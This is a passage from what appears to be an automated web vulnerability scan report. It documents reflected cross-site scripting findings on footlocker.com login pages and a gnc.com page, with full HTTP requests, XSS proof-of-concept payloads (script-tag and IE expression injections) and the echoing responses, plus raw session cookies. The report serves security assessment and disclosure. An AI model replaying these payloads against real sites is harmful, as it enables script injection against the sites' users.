cmRS=&t1=1305510865474&t2=1305510881356&t3=1305541986623&t4=1305510858114&lti=1305541986623&ln=&hr=javascript%3AopenLoginDialogForID%28top_welcome_login%2C%20null%2C%20null%2C%20function%28%29%20%7BupdateWelcome%28%29%7D%2C%20left%2C%20Global%20Header%2C%20Log%20In%20%2C%20true%2C%20true%29&fti=&fn=keywordSearch%3A0%3B&ac=&fd=&uer=&fu=&pi=Home&ho=rpt.footlocker.com/eluminate%3F&ci=90101910

Response

HTTP/1.1 200 OK
Server: Apache
X-UA-Compatible: IE=EmulateIE7
P3P: policyref="http://www.footlocker.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:36:31 GMT
Connection: close
Set-Cookie: SSLC=web%2D15;domain=.footlocker.com;path=/
Set-Cookie: USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib;expires=Wed, 08-May-2041 10:36:31 GMT;path=/
Set-Cookie: BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib;path=/
Set-Cookie: TID=5555%2D37151120432137200525561%2D0;expires=Sun, 14-Aug-2011 10:36:31 GMT;path=/
Content-Length: 239


   <iframe src="http://www.footlocker.com/login/login_form.cfm?secured=false&bv_RR_enabled=true&bv_AA_enabled=529c3"style="x:expression(alert(1))"362edd0e270&dontRunBV=true" width="250" height="185" frameborder="0" scrolling="no">
...[SNIP]...

5.57. http://www.footlocker.com/login/login.cfm [bv_RR_enabled parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.footlocker.com
Path:   /login/login.cfm

Issue detail

The value of the bv_RR_enabled request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 327b2"style%3d"x%3aexpression(alert(1))"aca39a4f38b was submitted in the bv_RR_enabled parameter. This input was echoed as 327b2"style="x:expression(alert(1))"aca39a4f38b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /login/login.cfm?secured=false&bv_RR_enabled=327b2"style%3d"x%3aexpression(alert(1))"aca39a4f38b&bv_AA_enabled=true&dontRunBV=true HTTP/1.1
Host: www.footlocker.com
Proxy-Connection: keep-alive
Referer: http://www.footlocker.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NST=2011%2D05%2D15%2020%3A43%3A37; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; CHOSEN_BANNER_ID=FS/$75; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; SSLC=web07; USER_PROFILE=HSPEqM4qU3DrFgRRbE4xA41L%2FxlKfNqQFH82vg1uFDf78j9GgBKSVG72ux9P9BBD9TNotE%2FuTdY7%0ApgsOVdTPmuf5mHGkQdt%2Fp4QG7ekqXGW%2Bc0%2BRT5CrpIV02E6hdSX61Dc5kPpRmjrov7on6s6li5HE%0AlOQG5YDlPEHH39sa1pRrpC3F25gGPN%2B9AXbwHEZb7MdHE8MV1vwxbOmvVo1eIzUeLfk1WM7eU85U%0AI9k9nJhUP8QjAazzjzcfG7j8i%2FZcdDc6rIzc9KtfsknfcwMpBJgyU6MmKYeBzKCHNiF4nGiiNSnF%0AcO5qGOI%2F1ENBjQbjXaghymu5WCtRYmAA%2FyLJM6SorvFGpkVfhe2sQZVzu3Kglt%2BFhTm8qRZenVT4%0AVbKkKIGY%2BpNyEWDhq79vMwb2kdMXujxgmwUz; BROWSER_SESSION=ralquAXUBpcSoNO65%2FZbRPD%2FAJ%2F1qkUwimcu38BTWxf6OLJJhPFUS2qHovA0PKYQ68EfgqxTfvoM%0ANZstUyOpfmuQYhPsaDqR; TID=5555%2D37151120432137200525561%2D0; cmTPSet=Y; fcspersistslider_click_1=1; cmRS=&t1=1305510865474&t2=1305510881356&t3=1305541986623&t4=1305510858114&lti=1305541986623&ln=&hr=javascript%3AopenLoginDialogForID%28top_welcome_login%2C%20null%2C%20null%2C%20function%28%29%20%7BupdateWelcome%28%29%7D%2C%20left%2C%20Global%20Header%2C%20Log%20In%20%2C%20true%2C%20true%29&fti=&fn=keywordSearch%3A0%3B&ac=&fd=&uer=&fu=&pi=Home&ho=rpt.footlocker.com/eluminate%3F&ci=90101910

Response

HTTP/1.1 200 OK
Server: Apache
X-UA-Compatible: IE=EmulateIE7
P3P: policyref="http://www.footlocker.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:36:30 GMT
Connection: close
Set-Cookie: SSLC=web%2D15;domain=.footlocker.com;path=/
Set-Cookie: USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib;expires=Wed, 08-May-2041 10:36:30 GMT;path=/
Set-Cookie: BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib;path=/
Set-Cookie: TID=5555%2D37151120432137200525561%2D0;expires=Sun, 14-Aug-2011 10:36:30 GMT;path=/
Content-Length: 239


   <iframe src="http://www.footlocker.com/login/login_form.cfm?secured=false&bv_RR_enabled=327b2"style="x:expression(alert(1))"aca39a4f38b&bv_AA_enabled=true&dontRunBV=true" width="250" height="185" frameborder="0" scrolling="no">
...[SNIP]...

5.58. http://www.footlocker.com/login/login_forgotpassword.cfm [bv_AA_enabled parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.footlocker.com
Path:   /login/login_forgotpassword.cfm

Issue detail

The value of the bv_AA_enabled request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 361dd"style%3d"x%3aexpression(alert(1))"9d00252baee was submitted in the bv_AA_enabled parameter. This input was echoed as 361dd"style="x:expression(alert(1))"9d00252baee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /login/login_forgotpassword.cfm?secured=false&bv_RR_enabled=true&bv_AA_enabled=true361dd"style%3d"x%3aexpression(alert(1))"9d00252baee HTTP/1.1
Host: www.footlocker.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NST=2011%2D05%2D15%2020%3A43%3A37; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; CHOSEN_BANNER_ID=FS/$75; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; cmTPSet=Y; fcspersistslider_click_1=1; cmRS=&t1=1305510865474&t2=1305510881356&t3=1305541986623&t4=1305510858114&lti=1305541986623&ln=&hr=javascript%3AopenLoginDialogForID%28top_welcome_login%2C%20null%2C%20null%2C%20function%28%29%20%7BupdateWelcome%28%29%7D%2C%20left%2C%20Global%20Header%2C%20Log%20In%20%2C%20true%2C%20true%29&fti=&fn=keywordSearch%3A0%3B&ac=&fd=&uer=&fu=&pi=Home&ho=rpt.footlocker.com/eluminate%3F&ci=90101910; SSLC=web%2D06; USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib; BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib; TID=5555%2D37151120432137200525561%2D0

Response

HTTP/1.1 200 OK
Server: Apache
X-UA-Compatible: IE=EmulateIE7
P3P: policyref="http://www.footlocker.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:36:42 GMT
Connection: close
Set-Cookie: SSLC=web%2D22;domain=.footlocker.com;path=/
Set-Cookie: USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib;expires=Wed, 08-May-2041 10:36:42 GMT;path=/
Set-Cookie: BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib;path=/
Set-Cookie: TID=5555%2D37151120432137200525561%2D0;expires=Sun, 14-Aug-2011 10:36:42 GMT;path=/
Content-Length: 2836


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<form action="https://www.footlocker.com/login/login_forgotpassword_action.cfm?secured=false&bv_RR_enabled=true&bv_AA_enabled=true361dd"style="x:expression(alert(1))"9d00252baee" method="post">
...[SNIP]...

5.59. http://www.footlocker.com/login/login_form.cfm [%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000121)%3C/script%3E parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.footlocker.com
Path:   /login/login_form.cfm

Issue detail

The value of the %27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000121)%3C/script%3E request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 526f0"><script>alert(1)</script>8748cce5433 was submitted in the %27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000121)%3C/script%3E parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /login/login_form.cfm?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000121)%3C/script%3E526f0"><script>alert(1)</script>8748cce5433 HTTP/1.1
Host: www.footlocker.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NST=2011%2D05%2D15%2020%3A43%3A37; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; CHOSEN_BANNER_ID=FS/$75; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; cmTPSet=Y; fcspersistslider_click_1=1; NewRegistrant=Global Header Log In|Create an Account; cmRS=&t1=1305510865474&t2=1305510881356&t3=1305542003667&t4=1305510858114&lti=1305541986623&ln=&hr=javascript%3AopenLoginDialogForID%28top_welcome_login%2C%20null%2C%20null%2C%20function%28%29%20%7BupdateWelcome%28%29%7D%2C%20left%2C%20Global%20Header%2C%20Log%20In%20%2C%20true%2C%20true%29&fti=&fn=keywordSearch%3A0%3B&ac=&fd=&uer=&fu=&pi=Home&ho=rpt.footlocker.com/eluminate%3F&ci=90101910; SSLC=web%2D22; USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib; BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib; TID=5555%2D37151120432137200525561%2D0

Response

HTTP/1.1 200 OK
Server: Apache
X-UA-Compatible: IE=EmulateIE7
P3P: policyref="http://www.footlocker.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:58:43 GMT
Connection: close
Set-Cookie: SSLC=web%2D06;domain=.footlocker.com;path=/
Set-Cookie: USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib;expires=Wed, 08-May-2041 10:58:43 GMT;path=/
Set-Cookie: BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib;path=/
Set-Cookie: TID=5555%2D37151120432137200525561%2D0;expires=Sun, 14-Aug-2011 10:58:43 GMT;path=/
Content-Length: 3661


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
</script>526f0"><script>alert(1)</script>8748cce5433" VALUE="">
...[SNIP]...

5.60. http://www.footlocker.com/login/login_form.cfm [bv_AA_enabled parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.footlocker.com
Path:   /login/login_form.cfm

Issue detail

The value of the bv_AA_enabled request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6784e"style%3d"x%3aexpression(alert(1))"6c3e0589f71 was submitted in the bv_AA_enabled parameter. This input was echoed as 6784e"style="x:expression(alert(1))"6c3e0589f71 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /login/login_form.cfm?secured=false&bv_RR_enabled=true&bv_AA_enabled=true6784e"style%3d"x%3aexpression(alert(1))"6c3e0589f71&dontRunBV=true HTTP/1.1
Host: www.footlocker.com
Proxy-Connection: keep-alive
Referer: http://www.footlocker.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NST=2011%2D05%2D15%2020%3A43%3A37; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; CHOSEN_BANNER_ID=FS/$75; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; cmTPSet=Y; fcspersistslider_click_1=1; cmRS=&t1=1305510865474&t2=1305510881356&t3=1305541986623&t4=1305510858114&lti=1305541986623&ln=&hr=javascript%3AopenLoginDialogForID%28top_welcome_login%2C%20null%2C%20null%2C%20function%28%29%20%7BupdateWelcome%28%29%7D%2C%20left%2C%20Global%20Header%2C%20Log%20In%20%2C%20true%2C%20true%29&fti=&fn=keywordSearch%3A0%3B&ac=&fd=&uer=&fu=&pi=Home&ho=rpt.footlocker.com/eluminate%3F&ci=90101910; SSLC=web%2D06; USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib; BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib; TID=5555%2D37151120432137200525561%2D0

Response

HTTP/1.1 200 OK
Server: Apache
X-UA-Compatible: IE=EmulateIE7
P3P: policyref="http://www.footlocker.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:36:37 GMT
Connection: close
Set-Cookie: SSLC=web%2D15;domain=.footlocker.com;path=/
Set-Cookie: USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib;expires=Wed, 08-May-2041 10:36:37 GMT;path=/
Set-Cookie: BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib;path=/
Set-Cookie: TID=5555%2D37151120432137200525561%2D0;expires=Sun, 14-Aug-2011 10:36:37 GMT;path=/
Content-Length: 3321


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<form action="https://www.footlocker.com/login/login_action.cfm?secured=false&bv_RR_enabled=true&bv_AA_enabled=true6784e"style="x:expression(alert(1))"6c3e0589f71" method="post" target="_self">
...[SNIP]...

5.61. http://www.footlocker.com/login/login_form.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.footlocker.com
Path:   /login/login_form.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc4cf"><script>alert(1)</script>a937fb8d7fa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /login/login_form.cfm?cc4cf"><script>alert(1)</script>a937fb8d7fa=1 HTTP/1.1
Host: www.footlocker.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Server: Apache
X-UA-Compatible: IE=EmulateIE7
P3P: policyref="http://www.footlocker.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:57:51 GMT
Connection: close
Set-Cookie: SSLC=web%2D22;domain=.footlocker.com;path=/
Set-Cookie: USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kvNzcq7EhhaxwicsoNK5tEHcjE3%0AYFDrCAOfSiDaoXvuilQ%2FxCMBrPOPNx8buPyL9lx0NzqsjNz0q4kL6gSipJbM8SiVTyaUlrgEsJFe%0AR0Pt4%2BMEOSoTJQWYIpa4nKSm4viwlCWT1JV2V7KDGygnmWiNg1zAOCJfoc2GfIzeW5%2FeSK5uXUOS%0AKuE8UK42iD0wQl31wi0YADO2S9yjp8izb9ei;expires=Wed, 08-May-2041 10:57:51 GMT;path=/
Set-Cookie: BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQqXKf%2FLacY0A0lvf86Z45bfsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib;path=/
Set-Cookie: NST=2011%2D05%2D16%2005%3A57%3A51;path=/
Set-Cookie: TID=5555%2D51161105572151050592439%2D0;expires=Sun, 14-Aug-2011 10:57:51 GMT;path=/
Set-Cookie: TRACK_USER_P=73934511611055751050537879;expires=Wed, 08-May-2041 10:57:51 GMT;path=/
Set-Cookie: DOTOMI_SESSION=1;path=/
Set-Cookie: CHOSEN_BANNER=2;expires=Wed, 08-May-2041 10:57:51 GMT;path=/
Content-Length: 3665


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<INPUT TYPE="hidden" name="cc4cf"><script>alert(1)</script>a937fb8d7fa" VALUE="1">
...[SNIP]...

5.62. http://www.gnc.com/community/index.jsp%20%20 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gnc.com
Path:   /community/index.jsp%20%20

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a33e7--><script>alert(1)</script>7d4814ce5e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /community/index.jsp%20%20?a33e7--><script>alert(1)</script>7d4814ce5e6=1 HTTP/1.1
Host: www.gnc.com
Proxy-Connection: keep-alive
Referer: http://app.gnc.com/profile/profile.cfm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
